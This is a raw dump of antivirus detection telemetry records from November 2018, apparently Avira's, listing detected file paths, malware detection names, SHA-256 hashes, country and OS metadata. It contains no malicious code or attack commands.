  Row(detection=Row(filename='avscan-20181102-051030-96b4d429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051030-96B4D429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055304-88c2a620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055304-88C2A620', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061615-c5e2613e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061615-C5E2613E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051804-a534ce87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051804-A534CE87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052333-6976c75e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052333-6976C75E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060004-833e1c60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060004-833E1C60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060015-8a1d6985', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060015-8A1D6985', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052609-c66d8e27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052609-C66D8E27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054758-d2b1c065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054758-D2B1C065', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055550-ec3feca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055550-EC3FECA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052721-f1790565', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052721-F1790565', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053639-3dc7d203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053639-3DC7D203', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054047-d1993f63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054047-D1993F63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054007-ba153d31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054007-BA153D31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052953-4c3458fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052953-4C3458FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051843-bc52abdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051843-BC52ABDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060327-fc1c8b9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060327-FC1C8B9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054047-d19d05d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054047-D19D05D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051712-86337382', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051712-86337382', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182115-0c1fbde0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12cd615d\\AVSCAN-20181102-180902-AFF6B782\\AVSCAN-20181102-182115-0C1FBDE0', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:21:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060720-87118142', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060720-87118142', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051415-1d1922fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051415-1D1922FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055941-75b4181c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055941-75B4181C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054832-e6e6102d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054832-E6E6102D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060257-ea4c477b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060257-EA4C477B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051915-cfd0ce44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051915-CFD0CE44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052230-43c9a63c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052230-43C9A63C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062136-85ad5d5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062136-85AD5D5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061000-e66690f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061000-E66690F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054901-f812f128', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054901-F812F128', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061549-b6e8971b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061549-B6E8971B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053443-f8ce40db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053443-F8CE40DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052520-a9233e8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052520-A9233E8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053407-e390c0b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053407-E390C0B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051750-9d0cc30f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051750-9D0CC30F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062144-8a5eee09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062144-8A5EEE09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055923-6b0221bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055923-6B0221BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055435-bf34059b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055435-BF34059B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053500-030bdadc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053500-030BDADC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='quick.exe', filepath='\\\\79.9.201.187\\Public\\server.c\\QUICK\\B\\quick.exe', filesize=1600000, name='W32/Stanit.#M1.#R1'), hash='26d452fcc6f931b8b0a31778caafbea51111e1069d41c2ee374c87e902b3e29e', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T22:33:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1989859\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-01T05:31:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183645-84b74198', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ce689a0\\AVSCAN-20181101-183432-716FC92E\\AVSCAN-20181101-183645-84B74198', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='walpap.pif', filepath='D:\\DATA_SHARE\\walpap\\walpap.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155750-d4439c35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155750-D4439C35', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\My Documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154902-7b715705', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154902-7B715705', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155501-b7cfd9ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155501-B7CFD9AC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='0188bf7cf780331bcef40de46ea8c9bd34f17ed7e681b496893f590ac5ab1df1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6534200, timestamp='2018-11-01T13:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114954-1bb2ef00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114954-1BB2EF00', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:49:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114532-d5726b2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-114532-D5726B2F', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:42:24Z'), dt=datetime.date(2018, 11, 1)),
